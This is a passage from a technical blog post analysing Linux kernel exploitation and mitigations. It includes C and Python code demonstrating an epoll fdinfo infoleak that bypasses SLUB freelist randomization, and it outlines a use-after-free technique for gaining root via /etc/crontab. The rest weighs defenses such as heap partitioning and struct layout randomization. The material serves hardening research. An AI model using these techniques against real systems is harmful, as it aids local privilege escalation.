In both these cases, explicitly stripping tag bits would be an acceptable workaround because a pointer without tag bits still uniquely identifies a memory location; and given that these are very special interfaces that intentionally expose some degree of information about kernel pointers to userspace, it would be reasonable to adjust this code manually.

A somewhat more interesting example is the behavior of this piece of userspace code:

#define _GNU_SOURCE
#include <sys/epoll.h>
#include <sys/eventfd.h>
#include <sys/resource.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

int main(void) {
  struct rlimit rlim;
  SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));
  rlim.rlim_cur = rlim.rlim_max;
  SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));

  cpu_set_t cpuset;
  CPU_ZERO(&cpuset);
  CPU_SET(0, &cpuset);
  SYSCHK(sched_setaffinity(0, sizeof(cpuset), &cpuset));

  int epfd = SYSCHK(epoll_create1(0));
  for (int i=0; i<1000; i++)
    SYSCHK(eventfd(0, 0));
  for (int i=0; i<192; i++) {
    int fd = SYSCHK(eventfd(0, 0));
    struct epoll_event event = {
      .events = EPOLLIN,
      .data = { .u64 = i }
    };
    SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event));
  }

  char cmd[100];
  sprintf(cmd, "cat /proc/%d/fdinfo/%d", getpid(), epfd);
  system(cmd);
}

It first creates a ton of eventfds that aren't used. Then it creates a bunch more eventfds and creates epoll watches for them, in creation order, with a monotonically incrementing counter in the "data" field. Afterwards, it asks the kernel to print the current state of the epoll instance, which comes with a list of all registered epoll watches, including the value of the data member (in hex). But how is this list sorted? Here's the result of running that code in an Ubuntu 20.10 VM (truncated, because it's a bit long):

user@ubuntuvm:~/epoll_fdinfo$ ./epoll_fdinfo 
pos:    0
flags:  02
mnt_id: 14
tfd:     1040 events:       19 data:               24  pos:0 ino:2f9a sdev:d
tfd:     1050 events:       19 data:               2e  pos:0 ino:2f9a sdev:d
tfd:     1024 events:       19 data:               14  pos:0 ino:2f9a sdev:d
tfd:     1029 events:       19 data:               19  pos:0 ino:2f9a sdev:d
tfd:     1048 events:       19 data:               2c  pos:0 ino:2f9a sdev:d
tfd:     1042 events:       19 data:               26  pos:0 ino:2f9a sdev:d
tfd:     1026 events:       19 data:               16  pos:0 ino:2f9a sdev:d
tfd:     1033 events:       19 data:               1d  pos:0 ino:2f9a sdev:d
[...]

The data: field here is the loop index we stored in the .data member, formatted as hex. Here is the complete list of the data values in decimal:

36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19, 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110, 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10, 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118, 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81, 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160, 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

While these look sort of random, you can see that the list can be split into blocks of (at most) 32 values, each consisting of a shuffled contiguous sequence of numbers:

Block 1 (32 values in range 19-50):
36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19

Block 2 (32 values in range 83-114):
95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110

Block 3 (19 values in range 0-18):
12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10

Block 4 (32 values in range 115-146):
135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118

Block 5 (32 values in range 51-82):
66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81

Block 6 (32 values in range 147-178):
177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160

Block 7 (13 values in range 179-191):
186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

What's going on here becomes clear when you look at the data structures epoll uses internally. ep_insert calls ep_rbtree_insert to insert a struct epitem into a red-black tree (a type of sorted binary tree); and this red-black tree is sorted using a tuple of a struct file * and a file descriptor number:

/* Compare RB tree keys */
static inline int ep_cmp_ffd(struct epoll_filefd *p1,
                             struct epoll_filefd *p2)
{
        return (p1->file > p2->file ? +1:
                (p1->file < p2->file ? -1 : p1->fd - p2->fd));
}

So the values we're seeing have been ordered based on the virtual address of the corresponding struct file; and SLUB allocates struct file from order-1 pages (i.e. pages of size 8 KiB), which can hold 32 objects each:

root@ubuntuvm:/sys/kernel/slab/filp# cat order 
1
root@ubuntuvm:/sys/kernel/slab/filp# cat objs_per_slab 
32
root@ubuntuvm:/sys/kernel/slab/filp# 

This explains the grouping of the numbers we saw: Each block of 32 contiguous values corresponds to an order-1 page that was previously empty and is used by SLUB to allocate objects until it becomes full.

With that knowledge, we can transform those numbers a bit, to show the order in which objects were allocated inside each page (excluding pages for which we haven't seen all allocations):

$ cat slub_demo.py 
#!/usr/bin/env python3
blocks = [
  [ 36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19 ],
  [ 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110 ],
  [ 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10 ],
  [ 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118 ],
  [ 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81 ],
  [ 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160 ],
  [ 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184 ]
]

for alloc_indices in blocks:
  if len(alloc_indices) != 32:
    continue
  # indices of allocations ('data'), sorted by memory location, shifted to be relative to the block
  alloc_indices_relative = [position - min(alloc_indices) for position in alloc_indices]
  # reverse mapping: memory locations of allocations,
  # sorted by index of allocation ('data').
  # if we've observed all allocations in a page,
  # these will really be indices into the page.
  memory_location_by_index = [alloc_indices_relative.index(idx) for idx in range(0, len(alloc_indices))]
  print(memory_location_by_index)
$ ./slub_demo.py 
[31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17]
[16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14]
[23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27]
[20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2]
[5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15]

And these sequences are almost the same, except that they have been rotated around by different amounts. This is exactly the SLUB freelist randomization scheme, as introduced in commit 210e7a43fa905!

When a SLUB kmem_cache is created (an instance of the SLUB allocator for a specific size class and potentially other specific attributes, usually initialized at boot time), init_cache_random_seq and cache_random_seq_create fill an array ->random_seq with randomly-ordered object indices via Fisher-Yates shuffle, with the array length equal to the number of objects that fit into a page. Then, whenever SLUB grabs a new page from the lower-level page allocator, it initializes the page freelist using the indices from ->random_seq, starting at a random index in the array (and wrapping around when the end is reached). (I'm ignoring the low-order allocation fallback here.)
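Here's a toy userspace model of that allocation pattern (invented for illustration, mirroring the behavior described above rather than the actual kernel code):

#include <stdio.h>
#include <stdlib.h>

#define OBJS_PER_SLAB 32

static unsigned random_seq[OBJS_PER_SLAB];

static void cache_random_seq_create(void) {  /* once per kmem_cache */
  for (unsigned i = 0; i < OBJS_PER_SLAB; i++)
    random_seq[i] = i;
  for (unsigned i = OBJS_PER_SLAB - 1; i > 0; i--) {  /* Fisher-Yates */
    unsigned j = rand() % (i + 1);
    unsigned tmp = random_seq[i];
    random_seq[i] = random_seq[j];
    random_seq[j] = tmp;
  }
}

static void init_slab_freelist(unsigned *freelist) {  /* per new page */
  unsigned start = rand() % OBJS_PER_SLAB;  /* random start, wraps around */
  for (unsigned i = 0; i < OBJS_PER_SLAB; i++)
    freelist[i] = random_seq[(start + i) % OBJS_PER_SLAB];
}

int main(void) {
  unsigned page1[OBJS_PER_SLAB], page2[OBJS_PER_SLAB];
  cache_random_seq_create();
  init_slab_freelist(page1);
  init_slab_freelist(page2);
  for (unsigned i = 0; i < OBJS_PER_SLAB; i++)
    printf("%u ", page1[i]);
  printf("\n");
  for (unsigned i = 0; i < OBJS_PER_SLAB; i++)
    printf("%u ", page2[i]);
  printf("\n");
}

Both output lines contain the same cyclic sequence, rotated by different amounts - the same pattern as in the transformed epoll data above.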

So in summary, we can bypass SLUB randomization for the slab from which struct file is allocated because someone used it as a lookup key in a specific type of data structure. This is already fairly undesirable if SLUB randomization is supposed to provide protection against some types of local attacks for all slabs.

The heap-randomization-weakening effect of such data structures is not necessarily limited to cases where elements of the data structure can be listed in-order by userspace: If there was a codepath that iterated through the tree in-order and freed all tree nodes, that could have a similar effect, because the objects would be placed on the allocator's freelist sorted by address, cancelling out the randomization. In addition, you might be able to leak information about iteration order through cache side channels or such.

If we introduce a probabilistic use-after-free mitigation that relies on attackers not being able to learn whether the uppermost bits of an object's address changed after it was reallocated, this data structure could also break that. This case is messier than things like kcmp() because here the address ordering leak stems from a standard data structure.

You may have noticed that some of the examples I'm using here would be more or less limited to cases where an attacker is reallocating memory with the same type as the old allocation, while a typical use-after-free attack ends up replacing an object with a differently-typed one to cause type confusion. As an example of a bug that can be exploited for privilege escalation without type confusion at the C structure level, see entry 808 in our bugtracker. My exploit for that bug first starts a writev() operation on a writable file, lets the kernel validate that the file is indeed writable, then replaces the struct file with a read-only file pointing to /etc/crontab, and lets writev() continue. This allows gaining root privileges through a use-after-free bug without having to mess around with kernel pointers, data structure layouts, ROP, or anything like that. Of course that approach doesn't work with every use-after-free though.

(By the way: For an example of pointer leaks through container data structures in a JavaScript engine, see this bug I reported to Firefox back in 2016, when I wasn't a Google employee, which leaks the low 32 bits of a pointer by timing operations on pessimal hash tables - basically turning the HashDoS attack into an infoleak. Of course, nowadays, a side-channel-based pointer leak in a JS engine would probably not be worth treating as a security bug anymore, since you can probably get the same result with Spectre...)

Against freeing SLUB pages: Preventing virtual address reuse beyond the slab

(Also discussed a little bit on the kernel-hardening list in this thread.)

A weaker but less CPU-intensive alternative to trying to provide complete use-after-free protection for individual objects would be to ensure that virtual addresses that have been used for slab memory are never reused outside the slab, but that physical pages can still be reused. This would be the same basic approach as used by PartitionAlloc and others. In kernel terms, that would essentially mean serving SLUB allocations from vmalloc space.

Some challenges I can think of with this approach are:

  • SLUB allocations are currently served from the linear mapping, which normally uses hugepages; if vmalloc mappings with 4K PTEs were used instead, TLB pressure might increase, which might lead to some performance degradation.
  • To be able to use SLUB allocations in contexts that operate directly on physical memory, it is sometimes necessary for SLUB pages to be physically contiguous. That's not really a problem, but it is different from default vmalloc behavior. (Sidenote: DMA buffers don't always have to be physically contiguous - if you have an IOMMU, you can use that to map discontiguous pages to a contiguous DMA address range, just like how normal page tables create virtually-contiguous memory. See this kernel-internal API for an example that makes use of this, and Fuchsia's documentation for a high-level overview of how all this works in general.)
  • Some parts of the kernel convert back and forth between virtual addresses, struct page pointers, and (for interaction with hardware) physical addresses. This is a relatively straightforward mapping for addresses in the linear mapping, but would become a bit more complicated for vmalloc addresses. In particular, page_to_virt() and phys_to_virt() would have to be adjusted.
    • This is probably also going to be an issue for things like Memory Tagging, since pointer tags will have to be reconstructed when converting back to a virtual address. Perhaps it would make sense to forbid these helpers outside low-level memory management, and change existing users to instead keep a normal pointer to the allocation around? Or maybe you could let pointers to struct page carry the tag bits for the corresponding virtual address in unused/ignored address bits?

The probability that this defense can prevent UAFs from leading to exploitable type confusion depends somewhat on the granularity of slabs; if specific struct types have their own slabs, it provides more protection than if objects are only grouped by size. So to improve the utility of virtually-backed slab memory, it would be necessary to replace the generic kmalloc slabs (which contain various objects, grouped only by size) with ones that are segregated by type and/or allocation site. (The grsecurity/PaX folks have vaguely alluded to doing something roughly along these lines using compiler instrumentation.)

After reallocation as pagetable: Structure layout randomization

Memory safety issues are often exploited in a way that involves creating a type confusion; e.g. exploiting a use-after-free by replacing the freed object with a new object of a different type.

A defense that first appeared in grsecurity/PaX is to shuffle the order of struct members at build time to make it harder to exploit type confusions involving structs; the upstream Linux version of this is in scripts/gcc-plugins/randomize_layout_plugin.c.
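For reference, opting a struct into the upstream plugin looks roughly like this (a sketch; in a kernel build the __randomize_layout marker comes from the kernel's compiler headers when CONFIG_GCC_PLUGIN_RANDSTRUCT is enabled - it is stubbed out here so that the snippet stands alone):

/* outside a kernel build, stub out the marker so this compiles standalone */
#ifndef __randomize_layout
#define __randomize_layout
#endif

struct example_ctx {
        unsigned long flags;
        int (*handler)(void *arg);
        void *cookie;
} __randomize_layout;  /* member order is shuffled at build time */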

How effective this is depends partly on whether the attacker is forced to exploit the issue as a confusion between two structs, or whether the attacker can instead exploit it as a confusion between a struct and an array (e.g. containing characters, pointers or PTEs). Especially if only a single struct member is accessed, a struct-array confusion might still be viable by spraying the entire array with identical elements. Against the type confusion described in this blogpost (between struct pid and page table entries), structure layout randomization could still be somewhat effective, since the reference count is half the size of a PTE and therefore can randomly be placed to overlap either the lower or the upper half of a PTE. (Except that the upstream Linux version of randstruct only randomizes explicitly-marked structs or structs containing only function pointers, and struct pid has no such marking.)

Of course, drawing a clear distinction between structs and arrays oversimplifies things a bit; for example, there might be struct types that have a large number of pointers of the same type or attacker-controlled values, not unlike an array.

If the attacker can not completely sidestep structure layout randomization by spraying the entire struct, the level of protection depends on how kernel builds are distributed:

  • If the builds are created centrally by one vendor and distributed to a large number of users, an attacker who wants to be able to compromise users of this vendor would have to rework their exploit to use a different type confusion for each release, which may force the attacker to rewrite significant chunks of the exploit.
  • If the kernel is individually built per machine (or similar), and the kernel image is kept secret, an attacker who wants to reliably exploit a target system may be forced to somehow leak information about some structure layouts and either prepare exploits for many different possible struct layouts in advance or write parts of the exploit interactively after leaking information from the target system.

To maximize the benefit of structure layout randomization in an environment where kernels are built centrally by a distribution/vendor, it would be necessary to make randomization a boot-time process by making structure offsets relocatable. (Or install-time, but that would break code signing.) Doing this cleanly (for example, such that 8-bit and 16-bit immediate displacements can still be used for struct member access where possible) would probably require a lot of fiddling with compiler internals, from the C frontend all the way to the emission of relocations. A somewhat hacky version of this approach already exists for C->BPF compilation as BPF CO-RE, using the clang builtin __builtin_preserve_access_index, but that relies on debuginfo, which probably isn't a very clean approach.
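To sketch what the CO-RE variant looks like (simplified; the struct here is a hand-written stand-in, not the real kernel definition):

/* with clang's BPF target, this attribute makes the compiler emit a
 * relocation for each member offset instead of a hardcoded constant;
 * the BPF loader then fixes the offsets up at load time against the
 * running kernel's type information */
struct task_struct___stub {
        int pid;
} __attribute__((preserve_access_index));

static long read_pid(struct task_struct___stub *task)
{
        return task->pid;  /* offset resolved at load time */
}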

Potential issues with structure layout randomization are:

  • If structures are hand-crafted to be particularly cache-efficient, fully randomizing structure layout could worsen cache behavior. The existing randstruct implementation optionally avoids this by trying to randomize only within a cache line.
  • Unless the randomization is applied in a way that is reflected in DWARF debug info and such (which it isn't in the existing GCC-based implementation), it can make debugging and introspection harder.
  • It can break code that makes assumptions about structure layout; but such code is gross and should be cleaned up anyway (and Gustavo Silva has been working on fixing some of those issues).

While structure layout randomization by itself is limited in its effectiveness by struct-array confusions, it might be more reliable in combination with limited heap partitioning: If the heap is partitioned such that only struct-struct confusion is possible, and structure layout randomization makes struct-struct confusion difficult to exploit, and no struct in the same heap partition has array-like properties, then it would probably become much harder to directly exploit a UAF as type confusion. On the other hand, if the heap is already partitioned like that, it might make more sense to go all the way with heap partitioning and create one partition per type instead of dealing with all the hassle of structure layout randomization.

(By the way, if structure layouts are randomized, padding should probably also be randomized explicitly instead of always being on the same side to maximally randomize structure members with low alignment; see my mailing list post on this topic for details.)

Control Flow Integrity

I want to explicitly point out that kernel Control Flow Integrity would have had no impact at all on this exploit strategy. By using a data-only strategy, we avoid having to leak addresses, avoid having to find ROP gadgets for a specific kernel build, and are completely unaffected by any defenses that attempt to protect kernel code or kernel control flow. Things like getting access to arbitrary files, increasing the privileges of a process, and so on don't require kernel instruction pointer control.

Like in my last blogpost on Linux kernel exploitation (which was about a buggy subsystem that an Android vendor added to their downstream kernel), to me, a data-only approach to exploitation feels very natural and seems less messy than trying to hijack control flow anyway.

Maybe things are different for userspace code; but for attacks by userspace against the kernel, I don't currently see a lot of utility in CFI because it typically only affects one of many possible methods for exploiting a bug. (Although of course there could be specific cases where a bug can only be exploited by hijacking control flow, e.g. if a type confusion only permits overwriting a function pointer and none of the permitted callees make assumptions about input types or privileges that could be broken by changing the function pointer.)

Making important data readonly

A defense idea that has shown up in a bunch of places (including Samsung phone kernels and XNU kernels for iOS) is to make data that is crucial to kernel security read-only except when it is intentionally being written to - the idea being that even if an attacker has an arbitrary memory write, they should not be able to directly overwrite specific pieces of data that are of exceptionally high importance to system security, such as credential structures, page tables, or (on iOS, using PPL) userspace code pages.

The problem I see with this approach is that a large portion of the things a kernel does are, in some way, critical to the correct functioning of the system and system security. MMU state management, task scheduling, memory allocation, filesystems, page cache, IPC, ... - if any one of these parts of the kernel is corrupted sufficiently badly, an attacker will probably be able to gain access to all user data on the system, or use that corruption to feed bogus inputs into one of the subsystems whose own data structures are read-only.

In my view, instead of trying to split out the most critical parts of the kernel and run them in a context with higher privileges, it might be more productive to go in the opposite direction and try to approximate something like a proper microkernel: Split out drivers that don't strictly need to be in the kernel and run them in a lower-privileged context that interacts with the core kernel through proper APIs. Of course that's easier said than done! But Linux does already have APIs for safely accessing PCI devices (VFIO) and USB devices from userspace, although userspace drivers aren't exactly its main use case.

(One might also consider making page tables read-only not because of their importance to system integrity, but because the structure of page table entries makes them nicer to work with in exploits that are constrained in what modifications they can make to memory. I dislike this approach because I think it has no clear conclusion and it is highly invasive regarding how data structures can be laid out.)

Conclusion

This was essentially a boring locking bug in some random kernel subsystem that, if it weren't for memory unsafety, shouldn't really have much relevance to system security. I wrote a fairly straightforward, unexciting (and admittedly unreliable) exploit against this bug; and probably the biggest challenge I encountered when trying to exploit it on Debian was to properly understand how the SLUB allocator works.

My intent in describing the exploit stages, and how different mitigations might affect them, is to highlight that the further a memory corruption exploit progresses, the more options an attacker gains; and so as a general rule, the earlier an exploit is stopped, the more reliable the defense is. Therefore, even if defenses that stop an exploit at an earlier point have higher overhead, they might still be more useful.

I think that the current situation of software security could be dramatically improved - in a world where a little bug in some random kernel subsystem can lead to a full system compromise, the kernel can't provide reliable security isolation. Security engineers should be able to focus on things like buggy permission checks and core memory management correctness, and not have to spend their time dealing with issues in code that ought to not have any relevance to system security.

In the short term, there are some band-aid mitigations that could be used to improve the situation - like heap partitioning or fine-grained UAF mitigation. These might come with some performance cost, and that might make them look unattractive; but I still think that they're a better place to invest development time than things like CFI, which attempts to protect against much later stages of exploitation.

In the long term, I think something has to change about the programming language - plain C is simply too error-prone. Maybe the answer is Rust; or maybe the answer is to introduce enough annotations to C (along the lines of Microsoft's Checked C project, although as far as I can see they mostly focus on things like array bounds rather than temporal issues) to allow Rust-equivalent build-time verification of locking rules, object states, refcounting, void pointer casts, and so on. Or maybe some completely different memory-safe language, neither C nor Rust, will end up becoming popular?

My hope is that perhaps in the mid-term future, we could have a statically verified, high-performance core of kernel code working together with instrumented, runtime-verified, non-performance-critical legacy code, such that developers can make a tradeoff between investing time into backfilling correct annotations and run-time instrumentation slowdown without compromising on security either way.

TL;DR

Memory corruption is a big problem because small bugs even outside security-related code can lead to a complete system compromise; and to address that, it is important that we:

  • in the short to medium term:

    • design new memory safety mitigations:
      • ideally, that can stop attacks at an early point where attackers don't have a lot of alternate options yet
        • maybe at the memory allocator level (i.e. SLUB)
      • that can't be broken using address tag leaks (or we try to prevent tag leaks, but that's really hard)
    • continue using attack surface reduction
      • in particular seccomp
    • explicitly prevent untrusted code from gaining important attack primitives
      • like FUSE, and potentially consider fine-grained scheduler control
  • in the long term:

    • statically verify correctness of most performance-critical code
      • this will require determining how to retrofit annotations for object state and locking onto legacy C code
      • consider designing runtime verification just for gaps in static verification